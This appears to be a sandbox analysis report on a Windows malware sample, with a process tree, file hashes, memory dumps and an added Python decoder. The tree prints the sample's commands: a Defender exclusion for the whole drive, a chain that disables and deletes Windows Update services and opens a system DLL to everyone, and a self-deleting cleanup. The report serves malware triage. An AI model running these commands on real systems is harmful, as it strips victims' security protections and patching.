    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe  [depth 3]
    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe  [depth 4]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\sc.exe  [depth 4]
    sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [depth 4]
    sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [depth 4]
    sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [depth 4]
    sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe  [depth 4]
    sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe  [depth 4]
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe  [depth 4]
    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe  [depth 4]
    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe  [depth 4]
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\reg.exe  [depth 4]
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe  [depth 4]
    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exe  [depth 4]
    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe  [depth 3]
    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exe  [depth 4]
    powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [depth 4]
    powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [depth 4]
    powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe  [depth 4]
    powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exe  [depth 3]
    C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [depth 3]
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[encoded command omitted in this copy of the report]"
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe  [depth 3]
    "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
-
C:\Windows\system32\choice.exe  [depth 4]
    choice /C Y /N /D Y /T 3
-
C:\Windows\System32\Conhost.exe  [depth 4]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
-
C:\Windows\system32\DllHost.exe  [depth 1]
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe  [depth 2]
    C:\Windows\system32\WerFault.exe -u -p 3296 -s 672
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exe  [depth 1]
    C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\RuntimeBroker.exe  [depth 1]
    C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\DllHost.exe  [depth 1]
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe  [depth 2]
    C:\Windows\system32\WerFault.exe -u -p 4404 -s 828
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\RuntimeBroker.exe  [depth 1]
    C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k netsvcs -p
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
-
C:\Windows\system32\SppExtComObj.exe  [depth 1]
    C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k LocalService -s W32Time
-
C:\Windows\system32\svchost.exe  [depth 1]
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
-
C:\Windows\servicing\TrustedInstaller.exe  [depth 1]
    C:\Windows\servicing\TrustedInstaller.exe
-
C:\Windows\System32\svchost.exe  [depth 1]
    C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exe  [depth 2]
    C:\Windows\system32\WerFault.exe -pss -s 456 -p 4404 -ip 4404
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe  [depth 2]
    C:\Windows\system32\WerFault.exe -pss -s 436 -p 3296 -ip 3296
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe  [depth 1]
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
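Two command-line patterns carry most of the signal in the process tree above: the base64 `-EncodedCommand` blob handed to powershell.exe, and the single `cmd.exe /c` chain that stops the update services, deletes their service keys, takes over WaaSMedicSvc.dll and disables the Windows Update scheduled tasks. The Python below is an added triage helper, not part of the sandbox report or of the sample: it decodes the blob (base64 over UTF-16LE, then strips the `<#...#>` filler comments) and splits the chain into classified (action, target) pairs. The two input strings are copied from the tree; the function names, the action categories and the expansion of `%SystemRoot%` to `C:\Windows` (which is how the sandbox's child-process lines show it) are this example's own assumptions.

```python
"""Added example (not from the sandbox report or the sample): triage helpers for
the two command-line patterns in the process tree above. The input strings are
copied from the tree; function names and action categories are constructed."""
from __future__ import annotations
import base64
import re
from collections import Counter

# Copied from the powershell.exe entries above (the same blob appears twice).
ENCODED_COMMAND = (
    "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIA"
    "agBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYA"
    "OgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkA"
    "dgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"
)

# Copied from the first cmd.exe entry above (only the line breaks are added).
CMD_CHAIN = (
    r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f'
    r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'
    r' & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q'
    r' & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f'
    r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE'
    r' & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)

def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of the script text in UTF-16LE."""
    return base64.b64decode(blob).decode("utf-16-le")

def strip_block_comments(script: str) -> str:
    """Drop the <# ... #> filler comments and collapse the spacing they leave."""
    return " ".join(re.sub(r"<#.*?#>", "", script, flags=re.S).split())

def split_cmd_chain(cmdline: str) -> list[str]:
    """Remove the leading cmd.exe /c prefix and split on unquoted '&'."""
    body = re.sub(r'^\s*"?[^"]*?cmd\.exe"?\s+/c\s+', "", cmdline, flags=re.I)
    parts, cur, quoted = [], [], False
    for ch in body:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]

def _tokens(cmd: str) -> list[str]:
    # Quoted task names contain spaces: keep them as one token, then unquote.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]

def _arg_after(toks: list[str], flag: str) -> str:
    return toks[[t.lower() for t in toks].index(flag.lower()) + 1]

def classify(cmd: str) -> tuple[str, str]:
    """Map one chained command to an (action, target) pair."""
    # The sandbox's child-process lines show %SystemRoot% resolved to C:\Windows.
    toks = _tokens(cmd.replace("%SystemRoot%", r"C:\Windows"))
    head, args = toks[0].lower(), toks[1:]
    if head == "sc" and len(args) > 1 and args[0].lower() == "stop":
        return "stop_service", args[1]
    if head == "reg" and args[0].lower() == "delete":
        return "delete_registry_key", args[1]
    if head == "reg" and args[0].lower() == "add":
        return "set_registry_value", f"{args[1]}\\{_arg_after(toks, '/v')}={_arg_after(toks, '/d')}"
    if head == "takeown":
        return "take_ownership", _arg_after(toks, "/f")
    if head == "icacls":
        # *S-1-1-0 is the well-known SID for Everyone; :F grants full control.
        return "grant_acl", f"{args[0]} -> {_arg_after(toks, '/grant')}"
    if head in ("rename", "ren"):
        # A cmd.exe builtin: it never shows up as a child process in the tree.
        return "rename_file", f"{args[0]} -> {args[1]}"
    if head == "schtasks" and "/disable" in (t.lower() for t in toks):
        return "disable_task", _arg_after(toks, "/TN")
    return "other", cmd

def parse_cmd_chain(cmdline: str) -> list[tuple[str, str]]:
    return [classify(part) for part in split_cmd_chain(cmdline)]

def summarize(actions: list[tuple[str, str]]) -> dict[str, int]:
    return dict(Counter(action for action, _ in actions))

if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED_COMMAND)))
    for action, target in parse_cmd_chain(CMD_CHAIN):
        print(f"{action:20} {target}")
    print(summarize(parse_cmd_chain(CMD_CHAIN)))
```

Decoding the blob gives `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, a Defender exclusion for the whole user profile and system drive, with the `<#kt#>`-style comments serving only to pad the string. The chain splits into 24 actions: 5 service stops, 5 service-key deletions, takeown/icacls/rename of WaaSMedicSvc.dll, 4 Windows Update policy values and 7 task disables. `rename` is a cmd.exe builtin, which is why the tree shows takeown.exe and icacls.exe children but no rename process; whether the DLL was actually moved aside as WaaSMedicSvc_BAK.dll has to be confirmed on disk rather than from the process list.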
Downloads
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe (listed twice in the report)
  Filesize 4.9MB
  MD5 e2c876ff5b1f24b59d928e595234cdef
  SHA1 82d06b09b2a8c514929aab293242d4796d4ee39f
  SHA256 e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244
  SHA512 9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER25A8.tmp.csv
  Filesize 38KB
  MD5 5290f987cf95b800d037d15573d10c3f
  SHA1 201bd1094256d15101c1538e772a838e25d76a3a
  SHA256 0cbf242187990e4889c137d35ef873bb665cb06bd8e3739aff25447777cd895f
  SHA512 1944772453307fa8baea3f367cbd93d47c2b134214eb68413f06896906d5efd1f3b59993039c0ced2afe3c96c3f87603acf6e714b155d4e1b173b8160b600513
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER25E8.tmp.txt
  Filesize 13KB
  MD5 e06d57588cd639daa6a3bd9662c915d7
  SHA1 67849da07d768801c626209193aeef896367f1d3
  SHA256 90d03b4357536488d22eaeec0677b62cfd5dd421412ac280d61f512cf0f02498
  SHA512 dad2de913ae944d0e6fe1511fff1fdc6d7fdb4575d9160d7597c3ee59e1d9ac3af519bc7185c419289aa01fca2b67f82373e1be8cf0afefc618900eb79c87e08
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2731.tmp.csv
  Filesize 38KB
  MD5 ebdba1b304e2b3a28b91fa62b0b7201a
  SHA1 a84508699252a78427876d15d8363b1ce325f08f
  SHA256 304a7756eb2986e2beb3942c7427e8211b425e96a8d1075534a73857778bff45
  SHA512 e45ff9e55d8b5a463cf4af2ade60a854996e74806a244d2d6b9f2b42ca941fc17296c7ed9653a833b0f9ec7b0dc4ecbe20e08be071e4769076d146415ae45992
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER282C.tmp.txt
  Filesize 13KB
  MD5 fe5305f72c809692e5f71c9a28a9ccd8
  SHA1 1b953e7a75e0edba0d09f38151aabb82628bffd6
  SHA256 b8c386fd5ef3bf6ac20dd454e6cd0615f25fa250808903b8abd5a4e377beef18
  SHA512 9ece5370274d744cbc74741440114bdae2f8654481326ef62d3470416fb14de444142c08d6c451465c4573bd4b242d5800a00972a0033054818a7226c5294b78
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize 2KB
  MD5 d85ba6ff808d9e5444a4b369f5bc2730
  SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 944B
  MD5 59d97011e091004eaffb9816aa0b9abd
  SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
  SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
  SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  Filesize 3KB
  MD5 556084f2c6d459c116a69d6fedcc4105
  SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 8e7a623fcc311b5017c82b1181911569
  SHA1 048d36afc6481760c53cff348c05744d98f3cce7
  SHA256 9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d
  SHA512 3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5 190cc2feb6fbf6a6143f296ebe043de5
  SHA1 8fa72a99c46ed77b602476c85ca2d8ea251b22fb
  SHA256 4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
  SHA512 94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616
-
C:\Windows\system32\drivers\etc\hosts
  Filesize 10KB
  MD5 240edd79afd2be36782e123a46d2feee
  SHA1 cc8885103fabbbd013b67237825b514d0b3578e4
  SHA256 538501999298d90cfc090b9d6413880646000a40228bee917d80804dfabd6dc2
  SHA512 9d8ce8196b2bf46ac58f0b77ede43d3a376cc28dce7067cd14575d63760b5490e07e6a78a61f1354f99c28c00492e7b4c1e7966529ead64844881c0592823625
-
memory/380-274-0x0000000003C80000-0x0000000003CA2000-memory.dmp  136KB
memory/380-188-0x0000000003D20000-0x0000000004348000-memory.dmp  6.2MB
memory/380-283-0x0000000004670000-0x00000000046D6000-memory.dmp  408KB
memory/380-278-0x0000000004450000-0x00000000044B6000-memory.dmp  408KB
memory/380-179-0x0000000001340000-0x0000000001376000-memory.dmp  216KB
memory/432-201-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/432-270-0x000002B14F560000-0x000002B14F58A000-memory.dmp  168KB
memory/448-146-0x0000000000000000-mapping.dmp
memory/504-264-0x000002A23F490000-0x000002A23F4BA000-memory.dmp  168KB
memory/504-199-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/604-255-0x000002135BAA0000-0x000002135BACA000-memory.dmp  168KB
memory/604-208-0x000002135BA70000-0x000002135BA93000-memory.dmp  140KB
memory/604-197-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/656-260-0x0000026661E00000-0x0000026661E2A000-memory.dmp  168KB
memory/656-202-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/744-198-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/744-262-0x00000206A2CE0000-0x00000206A2D0A000-memory.dmp  168KB
memory/748-381-0x0000000000000000-mapping.dmp
memory/772-149-0x0000000000000000-mapping.dmp
memory/828-486-0x0000000000000000-mapping.dmp
memory/916-499-0x0000000000000000-mapping.dmp
memory/940-200-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/940-265-0x000001D9022D0000-0x000001D9022FA000-memory.dmp  168KB
memory/988-151-0x0000000001310000-0x0000000001322000-memory.dmp  72KB
memory/988-139-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp  10.8MB
memory/988-192-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp  10.8MB
memory/988-132-0x0000000000140000-0x0000000000ACA000-memory.dmp  9.5MB
memory/988-133-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp  10.8MB
memory/1020-257-0x00000133090B0000-0x00000133090DA000-memory.dmp  168KB
memory/1020-196-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1028-277-0x0000020020AA0000-0x0000020020ACA000-memory.dmp  168KB
memory/1028-205-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1072-158-0x0000000000000000-mapping.dmp
memory/1124-279-0x0000026CAE8B0000-0x0000026CAE8DA000-memory.dmp  168KB
memory/1124-206-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1168-204-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1168-273-0x00000224C0280000-0x00000224C02AA000-memory.dmp  168KB
memory/1208-275-0x000002081A960000-0x000002081A98A000-memory.dmp  168KB
memory/1208-203-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1252-284-0x00000146E1090000-0x00000146E10BA000-memory.dmp  168KB
memory/1252-209-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1284-167-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp  10.8MB
memory/1284-164-0x0000000000000000-mapping.dmp
memory/1284-190-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp  10.8MB
memory/1344-210-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1344-285-0x0000023C270B0000-0x0000023C270DA000-memory.dmp  168KB
memory/1360-289-0x000001843A580000-0x000001843A5AA000-memory.dmp  168KB
memory/1360-211-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1384-291-0x0000023579B30000-0x0000023579B5A000-memory.dmp  168KB
memory/1384-212-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1420-213-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1420-292-0x0000012BCDB30000-0x0000012BCDB5A000-memory.dmp  168KB
memory/1476-152-0x0000000000000000-mapping.dmp
memory/1516-155-0x0000000000000000-mapping.dmp
memory/1524-214-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1524-293-0x000001C41EEE0000-0x000001C41EF0A000-memory.dmp  168KB
memory/1540-143-0x0000000000000000-mapping.dmp
memory/1604-295-0x0000025F105B0000-0x0000025F105DA000-memory.dmp  168KB
memory/1604-215-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1656-297-0x00000226D89D0000-0x00000226D89FA000-memory.dmp  168KB
memory/1656-216-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1676-217-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1676-299-0x000002997E4A0000-0x000002997E4CA000-memory.dmp  168KB
memory/1712-300-0x00000294180F0000-0x000002941811A000-memory.dmp  168KB
memory/1712-218-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1736-156-0x0000000000000000-mapping.dmp
memory/1796-219-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1796-301-0x0000022FA0F40000-0x0000022FA0F6A000-memory.dmp  168KB
memory/1804-220-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1804-303-0x0000010B9E930000-0x0000010B9E95A000-memory.dmp  168KB
memory/1816-153-0x0000000000000000-mapping.dmp
memory/1844-225-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1844-310-0x0000000001980000-0x00000000019AA000-memory.dmp  168KB
memory/1876-538-0x0000000000000000-mapping.dmp
memory/1944-221-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/1944-304-0x000001CC503C0000-0x000001CC503EA000-memory.dmp  168KB
memory/1952-305-0x0000023669FB0000-0x0000023669FDA000-memory.dmp  168KB
memory/1952-222-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/2012-307-0x000001F78BAA0000-0x000001F78BACA000-memory.dmp  168KB
memory/2012-223-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/2024-308-0x000001B4CF530000-0x000001B4CF55A000-memory.dmp  168KB
memory/2024-224-0x00007FFDBE670000-0x00007FFDBE680000-memory.dmp  64KB
memory/2064-141-0x0000000000000000-mapping.dmp
memory/2128-157-0x0000000000000000-mapping.dmp
